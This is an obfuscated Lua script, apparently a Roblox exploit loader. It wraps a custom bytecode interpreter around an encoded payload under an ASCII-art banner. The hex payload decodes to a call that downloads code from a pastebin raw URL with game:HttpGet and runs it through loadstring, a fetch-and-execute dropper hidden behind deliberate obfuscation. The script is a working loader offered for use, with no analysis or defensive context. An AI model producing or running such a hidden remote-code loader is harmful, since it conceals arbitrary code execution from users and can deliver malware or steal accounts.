--[[

 ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀  ▀▀▀▀█░█▀▀▀▀  ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌
▐░▌          ▐░▌               ▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌
▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄▄▄      ▐░▌          ▐░▌     ▐░▌ ▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌
▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌     ▐░▌          ▐░▌     ▐░▌▐░░░░░░░░▌▐░▌       ▐░▌
 ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀      ▐░▌          ▐░▌     ▐░▌ ▀▀▀▀▀▀█░▌▐░▌       ▐░▌
          ▐░▌▐░▌               ▐░▌          ▐░▌     ▐░▌       ▐░▌▐░▌       ▐░▌
 ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄  ▄▄▄▄█░█▄▄▄▄  ▄▄▄▄█░█▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌
▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
 ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
                                                                              

]]

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v90=v2(v0(v30,16));if v19 then local v110=v5(v90,v19);v19=nil;return v110;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -(120 -(32 + 85)))^(v32-(2 -1))))%((3 -1)^(((v33-(878 -(282 + 595))) -(v32-(2 -1))) + (620 -(555 + 63 + 1)))) ;return v91-(v91%(932 -(857 + 74))) ;else local v92=(570 -(367 + 201))^(v32-(1066 -(68 + 997))) ;return (((v31%(v92 + v92))>=v92) and (1271 -(226 + 1044))) or (0 -0) ;end end local function v21() local v34=0 + (350 -(87 + 263)) ;local v35;while true do if (v34==(958 -(892 + 65))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=(181 -(67 + 113)) -0 ;end end end local function v22() local v36=0 + (0 -0) ;local v37;local v38;while true do if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (7 -(4 + 1)) ;v36=1;end if (v36==(953 -(802 + 150))) then return (v38 * ((1686 -(915 + 82)) -433)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (11 -7) ;return (v42 * 16777216) + (v41 * (38178 + 27358)) + (v40 * (336 -80)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1188 -(1069 + 118) ;local v46=(v20(v44,2 -1 ,43 -23 ) * ((1 + 1)^(56 -24))) + v43 ;local v47=v20(v44,21 + (772 -(201 + 571)) ,822 -((1506 -(116 + 1022)) + 423) );local v48=((v20(v44,100 -(283 -215) )==1) and  -(19 -(10 + 8))) or 1 ;if (v47==(0 -0)) then if (v46==(442 -(416 + 26))) then return v48 * 0 ;else v47=3 -2 ;v45=0 + 0 + 0 ;end elseif (v47==(3621 -1574)) then return ((v46==(438 -(145 + 293))) and (v48 * ((431 -(44 + 386))/((5424 -3938) -(998 + 488))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((1 + 1)^(43 + 9)))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v67=860 -(814 + 45) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0 + 0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if ((1000 -(451 + 549))~=v102) then else local v115=(function() return 0 + 0 ;end)();local v116=(function() return;end)();while true do if (v115~=0) then else v116=(function() return 0 + 0 ;end)();while true do if (v116==(0 -0)) then v93=(function() return 0 + 0 ;end)();v94=(function() return nil;end)();v116=(function() return 1;end)();end if (v116==(1 -0)) then v102=(function() return 1 + 0 ;end)();break;end end break;end end end if (v102==(1 -0)) then local v117=(function() return 0 -0 ;end)();while true do if (v117~=0) then else while true do if (v93==0) then v94=(function() return v95();end)();if (v96(v94, #"[", #"!")~=(0 -0)) then else local v167=(function() return 0;end)();local v168=(function() return;end)();local v169=(function() return;end)();local v170=(function() return;end)();local v171=(function() return;end)();while true do if (v167~=(2 -1)) then else v170=(function() return nil;end)();v171=(function() return nil;end)();v167=(function() return 2 + 0 ;end)();end if (v167==(341 -(218 + 123))) then v168=(function() return 1581 -(1535 + 46) ;end)();v169=(function() return nil;end)();v167=(function() return 1 + 0 ;end)();end if ((398 -(115 + 281))~=v167) then else while true do if (v168== #"91(") then if (v96(v170, #"91(", #"xxx")== #"|") then v171[ #"xnxx"]=(function() return v97[v171[ #"asd1"]];end)();end v98[v99]=(function() return v171;end)();break;end if (v168~=(2 + 0)) then else local v173=(function() return 0 + 0 ;end)();local v174=(function() return;end)();while true do if (v173==(560 -(306 + 254))) then v174=(function() return 0 -0 ;end)();while true do if (v174~=(0 + 0)) then else if (v96(v170, #"!", #",")== #"~") then v171[2 + 0 ]=(function() return v97[v171[3 -1 ]];end)();end if (v96(v170,2,1469 -(899 + 568) )== #"}") then v171[ #"asd"]=(function() return v97[v171[ #"gha"]];end)();end v174=(function() return 1;end)();end if (v174==1) then v168=(function() return  #"asd";end)();break;end end break;end end end if (v168== #"!") then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175~=(0 -0)) then else v176=(function() return 0;end)();while true do if (v176~=1) then else v168=(function() return 869 -(550 + 317) ;end)();break;end if ((0 -0)~=v176) then else v171=(function() return {v100(),v100(),nil,nil};end)();if (v169==(0 -0)) then local v182=(function() return 603 -(268 + 335) ;end)();local v183=(function() return;end)();while true do if (v182==(0 -0)) then v183=(function() return 0;end)();while true do if (v183~=(290 -(60 + 230))) then else v171[ #"91("]=(function() return v100();end)();v171[ #"?id="]=(function() return v100();end)();break;end end break;end end elseif (v169== #"[") then v171[ #"19("]=(function() return v101();end)();elseif (v169==2) then v171[ #"xxx"]=(function() return v101() -((287 -(134 + 151))^16) ;end)();elseif (v169== #"xnx") then local v188=(function() return 1665 -(970 + 695) ;end)();local v189=(function() return;end)();while true do if (v188==(0 -0)) then v189=(function() return 0 + 0 ;end)();while true do if (v189==(1990 -(582 + 1408))) then v171[ #"-19"]=(function() return v101() -((1458 -(282 + 1174))^16) ;end)();v171[ #"0836"]=(function() return v100();end)();break;end end break;end end end v176=(function() return 3 -2 ;end)();end end break;end end end if (v168~=(0 -0)) then else local v177=(function() return 0 -0 ;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 0;end)();while true do if (v178~=(1825 -(1195 + 629))) then else v168=(function() return  #",";end)();break;end if (v178==(0 + 0)) then v169=(function() return v96(v94,1026 -(706 + 318) , #"19(");end)();v170=(function() return v96(v94, #"0313",1257 -(721 + 530) );end)();v178=(function() return 1;end)();end end break;end end end end break;end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end end end;end)();local v53=(function() return function(v103,v104,v105) local v106=(function() return 1271 -(945 + 326) ;end)();while true do if (v106==(0 -0)) then local v118=(function() return 0;end)();while true do if (v118~=(241 -(187 + 54))) then else local v121=(function() return 0 + 0 ;end)();while true do if (v121==(780 -(162 + 618))) then v103[v104-#"\\" ]=(function() return v105();end)();return v103,v104,v105;end end end end end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #">",v58 do local v70=(function() return 0;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if ((1 + 0)==v70) then v73=(function() return nil;end)();while true do if (0==v71) then local v119=(function() return 0;end)();while true do if (v119==(1 + 0)) then v71=(function() return 1 -0 ;end)();break;end if (v119~=(1288 -(993 + 295))) then else v72=(function() return v21();end)();v73=(function() return nil;end)();v119=(function() return 1;end)();end end end if (v71~=(1 -0)) then else if (v72== #"/") then v73=(function() return v21()~=(1171 -(418 + 753)) ;end)();elseif (v72==(1 + 1)) then v73=(function() return v24();end)();elseif (v72~= #"19(") then else v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end end break;end if (v70==(0 + 0)) then v71=(function() return 0;end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end end end v57[ #"xxx"]=(function() return v21();end)();for v74= #"!",v23() do FlatIdent_67C40,Descriptor,v21,v20,v59,v54,v74,v22,v23=(function() return v52(FlatIdent_67C40,Descriptor,v21,v20,v59,v54,v74,v22,v23);end)();end for v75= #"|",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[3 -1 ];local v66=v61[1 + 2 ];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1 + 0 ;local v81= -(530 -(406 + (2098 -(1913 + 62))));local v82={};local v83={...};local v84=v12("#",...) -(1 + 0) ;local v85={};local v86={};for v107=1322 -(1249 + 73) ,v84 do if (v107>=v78) then v82[v107-v78 ]=v83[v107 + 1 + 0 + 0 ];else v86[v107]=v83[v107 + (1146 -(466 + 679)) ];end end local v87=(v84-v78) + (2 -1) ;local v88;local v89;while true do v88=v76[v80];v89=v88[2 -1 ];if (v89<=3) then if ((4029<=4853) and (v89<=(1901 -(106 + 1794)))) then if (v89>((997 -620) -(142 + 235))) then v86[v88[1 + 1 ]]=v88[1936 -(565 + 1368) ];else local v124=0 + 0 ;local v125;while true do if ((v124==(0 -0)) or (516>3434)) then v125=v88[979 -(553 + 424) ];v86[v125]=v86[v125](v13(v86,v125 + 1 ,v81));break;end end end elseif ((4046>=3033) and (v89==(5 -3))) then local v126=114 -(4 + 110) ;local v127;local v128;local v129;local v130;while true do if (v126==(0 + 0)) then v127=v88[2 + 0 ];v128,v129=v79(v86[v127](v13(v86,v127 + (585 -(57 + 527)) ,v88[11 -8 ])));v126=1428 -(41 + 1386) ;end if (v126==(104 -(17 + 86))) then v81=(v129 + v127) -(2 -1) ;v130=0 + 0 ;v126=3 -1 ;end if (v126==(5 -(1664 -(1477 + 184)))) then for v164=v127,v81 do v130=v130 + (167 -((165 -43) + 44)) ;v86[v164]=v128[v130];end break;end end else local v131=v88[9 -7 ];local v132=v86[v88[(5 + 0) -2 ]];v86[v131 + (3 -2) ]=v132;v86[v131]=v132[v88[4 + 0 ]];end elseif ((v89<=(1 + 4)) or (2719<=1447)) then if (v89>(7 -(859 -(564 + 292)))) then v86[v88[67 -(30 + 35) ]]();else local v136;local v137,v138;local v139;local v140;v86[v88[2]]=v63[v88[3 + 0 ]];v80=v80 + (1258 -(1043 + 214)) ;v88=v76[v80];v86[v88[7 -5 ]]=v63[v88[1215 -(323 + 889) ]];v80=v80 + (2 -1) ;v88=v76[v80];v140=v88[582 -(361 + (377 -158)) ];v139=v86[v88[5 -2 ]];v86[v140 + (1 -0) ]=v139;v86[v140]=v139[v88[4]];v80=v80 + (239 -(64 + 174)) ;v88=v76[v80];v86[v88[1 + 1 ]]=v88[323 -(53 + 267) ];v80=v80 + (2 -1) ;v88=v76[v80];v140=v88[1 + 1 ];v137,v138=v79(v86[v140](v13(v86,v140 + (414 -((319 -(244 + 60)) + 398)) ,v88[985 -(18 + 964) ])));v81=(v138 + v140) -1 ;v136=(0 + 0) -0 ;for v157=v140,v81 do v136=v136 + 1 + 0 ;v86[v157]=v137[v136];end v80=v80 + 1 + 0 ;v88=v76[v80];v140=v88[2 + 0 ];v86[v140]=v86[v140](v13(v86,v140 + (1505 -((839 -(41 + 435)) + (2142 -(938 + 63)))) ,v81));v80=v80 + 1 ;v88=v76[v80];v86[v88[852 -(20 + 830) ]]();v80=v80 + 1 ;v88=v76[v80];do return;end end elseif (v89==(5 + 1)) then v86[v88[2 + 0 ]]=v63[v88[129 -(90 + 26 + 10) ]];else do return;end end v80=v80 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F377A6A6E614E766900083O0012043O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
